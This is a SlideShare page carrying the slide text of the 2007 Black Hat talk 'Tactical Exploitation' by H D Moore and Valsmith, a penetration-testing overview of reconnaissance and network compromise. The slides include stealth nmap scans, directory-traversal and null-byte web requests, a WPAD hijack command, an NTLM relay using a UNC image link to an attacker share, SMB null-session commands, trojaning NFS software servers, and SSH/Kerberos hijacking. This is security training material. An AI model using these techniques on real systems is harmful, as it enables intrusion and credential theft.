Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.
Tactical Exploitation
                          “the other way to pen-test “


                            hdm / valsmith
...
who are we ?
       H D Moore <hdm [at] metasploit.com>
              BreakingPoint Systems ||   Metasploit

       Valsmi...
why listen ?
           A different approach to pwning
       •



           Lots of fun techniques, new tools
       •

...
what do we cover ?
           Target profiling
       •


                 Discovery tools and techniques
             •

...
the tactical approach
           Vulnerabilites are transient
       •


                 Target the applications
        ...
the tactical approach
           Crackers are opportunists
       •


                 Expand the scope of your tests
    ...
the tactical approach
           Hacking is not about exploits
       •


                 The target is the data, not r00...
personnel discovery
           Security is a people problem
       •


                 People write your software
       ...
personnel discovery
           Identifying the meatware
       •


            • Google


            • Newsgroups


     ...
personnel discovery
           These tools give us
       •


                 Full names, usernames, email
             •...
personnel discovery




Las Vegas – August 2007
personnel discovery
           Started with company and jobs
       •


           Found online personnel directory
      ...
personnel discovery
           Joe Targetstein
       •




           Works as lead engineer in semiconductor department
...
network discovery
           Identify your target assets
       •


                 Find unknown networks
             •
...
network discovery
           The overused old busted
       •


                 Whois, Google, zone transfers
           ...
network discovery
           The shiny new hotness
       •



           Other people's services
       •


             ...
network discovery
           DomainTools vs Defcon.org
       •

             1.           Darktangent.net   0 listings0 l...
network discovery
           DomainTools vs Defcon.net
       •

                 1. 0day.com      0 listings0 listings0 l...
network discovery
           What does this get us?
       •


                 Proxied DNS probes, transfers
            ...
network discovery
           Active discovery techniques
       •


                 Trigger SMTP bounces
             •

...
network discovery
       Received: from unknown (HELO gateway1.rsasecurity.com)
         (216.162.240.250)
         by [ce...
application discovery
           If the network is the toast...
       •


           Applications are the butter.
       ...
application discovery
           Tons of great tools
       •


                 Nmap, Amap, Nikto, Nessus
             •
...
application discovery
           Slow and steady wins the deface
       •


                 Scan for specific port, one p...
application discovery
           Example target had custom IDS to
       •



           detect large # of host connection...
application discovery
           Target had internal app for software licensing /
       •



           distribution

   ...
application discovery
           Web Application Attack and Audit
       •



           Framework
              • W3AF: “...
application discovery


                          DEMO

Las Vegas – August 2007
client app discovery
           Client applications are fun!
       •


                 Almost always exploitable
       ...
client app discovery
           Common probe methods
       •


                 Mail links to the targets
             •
...
process discovery
           Track what your target does
       •


                 Activity via IP ID counters
         ...
process discovery
           Look for patterns of activity
       •


                 Large IP ID increments at night
   ...
process discovery
           Existing tools?
       •


                 None, really...
             •



           Easy...
process discovery
          ABOR : 2138        NOOP : 147379       SIZE : 76980
          ACCT : 2           OPTS : 21756 ...
process discovery



                                  << backups run at midnight


                                      ...
15 Minute Break
           Come back for the exploits!
       •




Las Vegas – August 2007
re-introduction
           In our last session...
       •


                 Discovery techniques and tools
             ...
external network
           The crunchy candy shell
       •


                 Exposed hosts and services
             •
...
attacking ftp transfers
           Active FTP transfers
       •


                 Clients often expose data ports
      ...
attacking web servers
           Brute force vhosts, files, dirs
       •


                 http://www.cray.com/old/
    ...
attacking web servers
           Apache Reverse Proxying
       •


             GET /%00 HTTP/1.1
             Host: real...
load balancers
         Cause load balancer to “leak”
     •



     internal IP information
         Use TCP half-close H...
load balancers
      ACEdirector mishandles TCP half-
     •

     close requests
     •



      Behavior can be used as ...
cgi case study
            Web Host with 1000's of sites
       •


            Had demo CGI for customers
       •


    ...
cgi case study
         Enumerated:
     •

          • Usernames


          • Dirs


          • Backup files


        ...
cgi case study
         Target happened to run solaris
     •

          • Solaris treats dirs as files


          • cat ...
cgi case study
         Found CGI script names
     •



         Googled for vulns
     •



         Gained shell 100's ...
attacking dns servers
           Brute force host names
       •



           XID sequence analysis
       •


          ...
authentication relays
           SMB/CIFS clients are fun!
       •


                 Steal hashes, redirect, MITM
      ...
social engineering
           Give away free toys
       •


                 CDROMs, USB keys, N800s
             •




 ...
internal network
           The soft chewy center
       •


                 This is the fun part :)
             •


   ...
netbios services
           NetBIOS names are magic
       •


           • WPAD


           • CALICENSE




Las Vegas – ...
dns services
           Microsoft DNS + DHCP = fun
       •


           • Inject host names into DNS


           • Hijac...
Hijacking NTLM
           Quickly own all local workstations
       •


           Gain access to mail and web sites
     ...
Hijacking NTLM
       1. MITM all outbound web traffic
                 Cache poison the “WPAD” host
             •


    ...
Hijacking NTLM
       2. Redirect HTTP requests to “intranet”
                 WPAD + SOCKS server
             •


      ...
Hijacking NTLM
       3. Return HTML page with UNC link
                 IE 5/6/7: <img src=”ipsharei.jpg”>
             •...
Hijacking NTLM
       4. Accept SMB connection and relay
                 Accept connection from the client
             •...
Hijacking NTLM
       5. Executing remote code
                 Disconnect the client
             •


                 Us...
Hijacking NTLM


                            DEMO

Las Vegas – August 2007
file servers
           “NAS appliances are safe and secure”
       •


                 Don't worry, the vendor sure does...
samba is awesome
           1999 called, want their bugs back
       •


                 Remember those scary “NULL Sessi...
smb case study
         Old bugs back to haunt new boxes
     •



         Found OS X Box running SMB
     •

           ...
smb case study
         Performed Null Session
     •

                 net use osxsmbipc$ “” /user:””
             •


  ...
samba vs metasploit
           Metasploit modules for Samba
       •


                 Linux (vSyscall + Targets)
       ...
nfs services
           NFS is your friend
       •


                 Dont forget its easy cousin NIS
             •




...
nfs services
           Exported NFS home directories
       •


                 Important target!
             •




   ...
nfs services
           If you are root on home server
       •


                 Become anyone (NIS/su)
             •

...
nfs services
           Software distro servers are fun!
       •


                 All nodes access over NFS
           ...
file services
           Example: all nodes were diskless / patched
       •




           Clients got software from NFS ...
trust relationships
           The target is unavailable to YOU
       •


                 Not to another host you can re...
trusts
           Deal with firewalls/TCP wrappers/ACLs
       •




           Find a node that is accepted and own it
  ...
trusts
           Example: Mixed network with Unix
       •



           wrapperd
                 Target Solaris homedir...
Hijacking SSH
           Idea is to abuse legitimate users access
       •



           over SSH

           If user can ...
Hijacking SSH
           Available tools
       •


             Metalstorm ssh hijacking
             •


           • Tr...
Hijacking SSH


                            DEMO

Las Vegas – August 2007
Hijacking Kerberos
           Kerberos is great for one time
       •



           authentication . . even for hackers

 ...
Hijacking Kerberos


                          DEMO

Las Vegas – August 2007
Conclusion
           Compromise a “secure” network
       •



           Determination + creativity wins
       •



   ...
Prochain SlideShare
Chargement dans…5
×

Tactical Exploitation - hdm valsmith

Tactical Exploitation - hdm valsmith metasploit hacking hacker

  • Identifiez-vous pour voir les commentaires

Tactical Exploitation - hdm valsmith

  1. 1. Tactical Exploitation “the other way to pen-test “ hdm / valsmith Black Hat USA 2007 Las Vegas – August 2007
  2. 2. who are we ? H D Moore <hdm [at] metasploit.com> BreakingPoint Systems || Metasploit Valsmith <valsmith [at] metasploit.com> Offensive Computing || Metasploit Las Vegas – August 2007
  3. 3. why listen ? A different approach to pwning • Lots of fun techniques, new tools • Real-world tested ;-) • Las Vegas – August 2007
  4. 4. what do we cover ? Target profiling • Discovery tools and techniques • Exploitation • Getting you remote access • Las Vegas – August 2007
  5. 5. the tactical approach Vulnerabilites are transient • Target the applications • Target the processes • Target the people • Target the trusts • You WILL gain access. • Las Vegas – August 2007
  6. 6. the tactical approach Crackers are opportunists • Expand the scope of your tests • Everything is fair game • What you dont test... • Someone else will! • Las Vegas – August 2007
  7. 7. the tactical approach Hacking is not about exploits • The target is the data, not r00t • Hacking is using what you have • Passwords, trust relationships • Service hijacking, auth tickets • Las Vegas – August 2007
  8. 8. personnel discovery Security is a people problem • People write your software • People secure your network • Identify the meatware first • Las Vegas – August 2007
  9. 9. personnel discovery Identifying the meatware • • Google • Newsgroups SensePost tools • Evolution from Paterva.com • Las Vegas – August 2007
  10. 10. personnel discovery These tools give us • Full names, usernames, email • Employment history • Phone numbers • Personal sites • Las Vegas – August 2007
  11. 11. personnel discovery Las Vegas – August 2007
  12. 12. personnel discovery Started with company and jobs • Found online personnel directory • Found people with access to data • Found resumes, email addresses • Email name = username = target • Las Vegas – August 2007
  13. 13. personnel discovery Joe Targetstein • Works as lead engineer in semiconductor department • Email address joet@company.com • Old newsgroup postings show • joet@joesbox.company.com Now we have username and a host to target to go • after semi conductor information Las Vegas – August 2007
  14. 14. network discovery Identify your target assets • Find unknown networks • Find third-party hosts • Dozens of great tools... • Lets stick to the less-known ones • Las Vegas – August 2007
  15. 15. network discovery The overused old busted • Whois, Google, zone transfers • Reverse DNS lookups • Las Vegas – August 2007
  16. 16. network discovery The shiny new hotness • Other people's services • CentralOps.net, DigitalPoint.com • DomainTools.com • Paterva.com • Las Vegas – August 2007
  17. 17. network discovery DomainTools vs Defcon.org • 1. Darktangent.net 0 listings0 listings0 listings 2. Defcon.net 0 listings0 listings0 listings 3. Defcon.org 1 listings18 listings 1 listings 4. Hackerjeopardy.com 0 listings0 listings0 listings 5. Hackerpoetry.com0 listings0 listings0 listings 6. Thedarktangent.com 0 listings0 listings0 listings 7. Thedarktangent.net 0 listings0 listings0 listings 8. Thedarktangent.org 0 listings0 listings0 listings Las Vegas – August 2007
  18. 18. network discovery DomainTools vs Defcon.net • 1. 0day.com 0 listings0 listings0 listings • 2. 0day.net 0 listings0 listings0 listings • 3. Darktangent.org 0 listings0 listings0 listings • [ snipped personal domains ] 12. Securityzen.com 0 listings0 listings0 listings • 13. Zeroday.com 0 listings0 listings0 listings • Las Vegas – August 2007
  19. 19. network discovery What does this get us? • Proxied DNS probes, transfers • List of virtual hosts for each IP • Port scans, traceroutes, etc • Gold mine of related info • Las Vegas – August 2007
  20. 20. network discovery Active discovery techniques • Trigger SMTP bounces • Brute force HTTP vhosts • Watch outbound DNS • Just email the users! • Las Vegas – August 2007
  21. 21. network discovery Received: from unknown (HELO gateway1.rsasecurity.com) (216.162.240.250) by [censored] with SMTP; 28 Jun 2007 15:11:29 -0500 Received: from hyperion.rsasecurity.com by gateway1.rsasecurity.com via smtpd (for [censored]. [xxx.xxx.xxx.xxx]) with SMTP; Thu, 28 Jun 2007 16:11:29 -0400 by hyperion.na.rsa.net (MOS 3.8.3-GA) To: user@[censored] Subject: Returned mail: User unknown (from [10.100.8.152]) Las Vegas – August 2007
  22. 22. application discovery If the network is the toast... • Applications are the butter. • Each app is an entry point • Finding these apps is the trick • Las Vegas – August 2007
  23. 23. application discovery Tons of great tools • Nmap, Amap, Nikto, Nessus • Commercial tools • Las Vegas – August 2007
  24. 24. application discovery Slow and steady wins the deface • Scan for specific port, one port only • IDS/IPS can't handle slow scans • Ex. nmap -sS -P0 -T 0 -p 1433 ips • Las Vegas – August 2007
  25. 25. application discovery Example target had custom IDS to • detect large # of host connections Standard nmap lit up IDS like XMAS • One port slow scan never detected • Know OS based on 1 port (139/22) • Las Vegas – August 2007
  26. 26. application discovery Target had internal app for software licensing / • distribution ~10,000 nodes had app installed • A couple of hours with IDA/Ollydbg showed • static Admin password in app's memory All accessible nodes owned, 0 exploits used • Las Vegas – August 2007
  27. 27. application discovery Web Application Attack and Audit • Framework • W3AF: “Metasploit for the web” Metasploit 3 scanning modules • • Scanning mixin Las Vegas – August 2007
  28. 28. application discovery DEMO Las Vegas – August 2007
  29. 29. client app discovery Client applications are fun! • Almost always exploitable • Easy to fingerprint remotely • Your last-chance entrance • Las Vegas – August 2007
  30. 30. client app discovery Common probe methods • Mail links to the targets • Review exposed web logs • Send MDNs to specific victims • Abuse all, everyone, team aliases • Las Vegas – August 2007
  31. 31. process discovery Track what your target does • Activity via IP ID counters • Last-modified headers • FTP server statistics • Las Vegas – August 2007
  32. 32. process discovery Look for patterns of activity • Large IP ID increments at night • FTP stats at certain times • Microsoft FTP SITE STATS • Web pages being uploaded • Check timestamps on images • Las Vegas – August 2007
  33. 33. process discovery Existing tools? • None, really... • Easy to script • • Use “hping” for IP ID tracking • Use netcat for SITE STATS Las Vegas – August 2007
  34. 34. process discovery ABOR : 2138 NOOP : 147379 SIZE : 76980 ACCT : 2 OPTS : 21756 SMNT : 16 ALLO : 32 PASS : 2050555100 STAT : 30812 APPE : 74 PASV : 2674909 STOR : 3035 CDUP : 5664 PORT : 786581 STRU : 3299 CWD : 388634 PWD : 179852 SYST : 175579 DELE : 1910 QUIT : 143771 TYPE : 3038879 FEAT : 2970 REIN : 16 USER : 2050654280 HELP : 470 REST : 31684 XCWD : 67 LIST : 3228866 RETR : 153140 XMKD : 12 MDTM : 49070 RMD : 41 XPWD : 1401 MKD : 870 RNFR : 58 XRMD : 2 MODE : 3938 RNTO : 2 NLST : 1492 SITE : 2048 ftp.microsoft.com [node] SITE STATS / Uptime: 47 days Las Vegas – August 2007
  35. 35. process discovery << backups run at midnight USA people wake up >> IP ID Monitoring / HACKER.COM Las Vegas – August 2007
  36. 36. 15 Minute Break Come back for the exploits! • Las Vegas – August 2007
  37. 37. re-introduction In our last session... • Discovery techniques and tools • In this session... • • Compromising systems! Las Vegas – August 2007
  38. 38. external network The crunchy candy shell • Exposed hosts and services • VPN and proxy services • Client-initiated sessions • Las Vegas – August 2007
  39. 39. attacking ftp transfers Active FTP transfers • Clients often expose data ports • NAT + Active FTP = Firewall Hole • Passive FTP transfers • Data port hijacking: DoS at least • pasvagg.pl still works just fine :-) • Las Vegas – August 2007
  40. 40. attacking web servers Brute force vhosts, files, dirs • http://www.cray.com/old/ • Source control files left in root • http://www.zachsong.com/CVS/Entries • Las Vegas – August 2007
  41. 41. attacking web servers Apache Reverse Proxying • GET /%00 HTTP/1.1 Host: realhost.com Apache Dynamic Virtual Hosting • GET / HTTP/1.1 Host: %00/ Las Vegas – August 2007
  42. 42. load balancers Cause load balancer to “leak” • internal IP information Use TCP half-close HTTP request • Alteon ACEdirector good example • Las Vegas – August 2007
  43. 43. load balancers ACEdirector mishandles TCP half- • close requests • Behavior can be used as signature • for existence of Load Balancer • Direct packets from real webserver • fowarded back to client (with IP) Las Vegas – August 2007
  44. 44. cgi case study Web Host with 1000's of sites • Had demo CGI for customers • CGI had directory traversal • www.host.com/cgi-bin/vuln.pl/../../cgi • CGI executable + writable on every • directory Common on web hosts! • • Las Vegas – August 2007
  45. 45. cgi case study Enumerated: • • Usernames • Dirs • Backup files • Other CGI scripts • VHOSTS Las Vegas – August 2007
  46. 46. cgi case study Target happened to run solaris • • Solaris treats dirs as files • cat /dirname = ls /dirname http://www.host.com/cgi-bin/vuln.cgi/../../../../dirname%00.html • Las Vegas – August 2007
  47. 47. cgi case study Found CGI script names • Googled for vulns • Gained shell 100's of different ways • Owned due to variety of layered • configuration issues Las Vegas – August 2007
  48. 48. attacking dns servers Brute force host names • XID sequence analysis • • BIND 9: PRNG / Birthday • VxWorks: XID = XID + 1 Return extra answers in response • Las Vegas – August 2007
  49. 49. authentication relays SMB/CIFS clients are fun! • Steal hashes, redirect, MITM • NTLM relay between protocols • SMB/HTTP/SMTP/POP3/IMAP • More on this later... • Las Vegas – August 2007
  50. 50. social engineering Give away free toys • CDROMs, USB keys, N800s • Replace UPS with OpenWRT • Cheap and easy to make • Las Vegas – August 2007
  51. 51. internal network The soft chewy center • This is the fun part :) • Easy to trick clients • Las Vegas – August 2007
  52. 52. netbios services NetBIOS names are magic • • WPAD • CALICENSE Las Vegas – August 2007
  53. 53. dns services Microsoft DNS + DHCP = fun • • Inject host names into DNS • Hijack the entire network dhcpcd -h WPAD -i eth0 • Las Vegas – August 2007
  54. 54. Hijacking NTLM Quickly own all local workstations • Gain access to mail and web sites • A new twist on “smbrelay2.cpp” • Yes, it was released in 2001. • Now implemented in Metasploit 3 • Las Vegas – August 2007
  55. 55. Hijacking NTLM 1. MITM all outbound web traffic Cache poison the “WPAD” host • Plain old ARP spoofing • DHCP / NetBIOS + “WPAD” • Run a rogue WiFi access point • Manipulate TOR connections • Las Vegas – August 2007
  56. 56. Hijacking NTLM 2. Redirect HTTP requests to “intranet” WPAD + SOCKS server • SQUID + transparent proxying • 302 Redirect • Las Vegas – August 2007
  57. 57. Hijacking NTLM 3. Return HTML page with UNC link IE 5/6/7: <img src=”ipsharei.jpg”> • Firefox: mozicon-url:file:////ip/share/i.jpg • Third-party plugins: • Adobe PDF Viewer • Windows Media Player • Microsoft Office • Las Vegas – August 2007
  58. 58. Hijacking NTLM 4. Accept SMB connection and relay Accept connection from the client • Connect to the target server (or client) • Ask target for Challenge Key • Provide this Key to the client • Allow the client to authenticate • Las Vegas – August 2007
  59. 59. Hijacking NTLM 5. Executing remote code Disconnect the client • Use authenticated session • • ADMIN$ + Service Control Manager • Access data, call RPC routines, etc • Access the remote registry Las Vegas – August 2007
  60. 60. Hijacking NTLM DEMO Las Vegas – August 2007
  61. 61. file servers “NAS appliances are safe and secure” • Don't worry, the vendor sure doesn't • Unpatched Samba daemons • • Snap, TeraServer, OS X, etc. Inconsistent file permissions • AFP vs NFS vs SMB • Las Vegas – August 2007
  62. 62. samba is awesome 1999 called, want their bugs back • Remember those scary “NULL Sessions” • Samba ENUM / SID2USR user listing • Massive information leaks via DCERPC • • Shares, Users, Policies • Brute force accounts (no lockout) Las Vegas – August 2007
  63. 63. smb case study Old bugs back to haunt new boxes • Found OS X Box running SMB • User sent mail touting OS X sec • Previous scans had found vulns • User: “false positive, its OS X” • Us: “Owned” • Las Vegas – August 2007
  64. 64. smb case study Performed Null Session • net use osxsmbipc$ “” /user:”” • Enumerated users and shares • • Brute forced several user accounts • Got shell, escalated to root • User: “but . .but . . its OS X!” Las Vegas – August 2007
  65. 65. samba vs metasploit Metasploit modules for Samba • Linux (vSyscall + Targets) • Mac OS X (PPC/x86) • Solaris (SPARC,x86) • Auxiliary PoCs • Las Vegas – August 2007
  66. 66. nfs services NFS is your friend • Dont forget its easy cousin NIS • Scan for port 111 / 2049 • showmount -e / showmount -a • Whats exported, whose mounting? • Las Vegas – August 2007
  67. 67. nfs services Exported NFS home directories • Important target! • If you get control • Own every node that mounts it • Las Vegas – August 2007
  68. 68. nfs services If you are root on home server • Become anyone (NIS/su) • Harvest known_hosts files • Harvest allowed_keys • Modify .login, etc. + insert trojans • Las Vegas – August 2007
  69. 69. nfs services Software distro servers are fun! • All nodes access over NFS • Write to software distro directories • Trojan every node at once • No exploits needed! • Las Vegas – August 2007
  70. 70. file services Example: all nodes were diskless / patched • Clients got software from NFS server • We hacked the software server • Using trust hijacking explained later • Inserted trojaned gnu binaries • 1000's of nodes sent us shells • Las Vegas – August 2007
  71. 71. trust relationships The target is unavailable to YOU • Not to another host you can reach... • Networks may not trust everyone • But they often trust each other :) • • Las Vegas – August 2007
  72. 72. trusts Deal with firewalls/TCP wrappers/ACLs • Find a node that is accepted and own it • People wrapper Unix and leave Windows • open Hack the Windows box and port forward • past wrappers Las Vegas – August 2007
  73. 73. trusts Example: Mixed network with Unix • wrapperd Target Solaris homedir server • Had auth credentials but couldn't reach • port 22 Found 1 vulnerable win box , owned / • installed portfworward to homedir port 22 • Las Vegas – August 2007
  74. 74. Hijacking SSH Idea is to abuse legitimate users access • over SSH If user can access other systems, why • can't you? (even without users password) One time passwords? No problem! • Intel gathering • Las Vegas – August 2007
  75. 75. Hijacking SSH Available tools • Metalstorm ssh hijacking • • Trojaned ssh clients • SSH master modes Dont for get TTY hijacking • Appcap • • TTYWatcher Who suspects a dead SSH session? • Las Vegas – August 2007
  76. 76. Hijacking SSH DEMO Las Vegas – August 2007
  77. 77. Hijacking Kerberos Kerberos is great for one time • authentication . . even for hackers Idea is to become a user and hijack • kerberos tickets Gain access to other trusted nodes • • Las Vegas – August 2007
  78. 78. Hijacking Kerberos DEMO Las Vegas – August 2007
  79. 79. Conclusion Compromise a “secure” network • Determination + creativity wins • Tools cannot replace talent. • Las Vegas – August 2007

×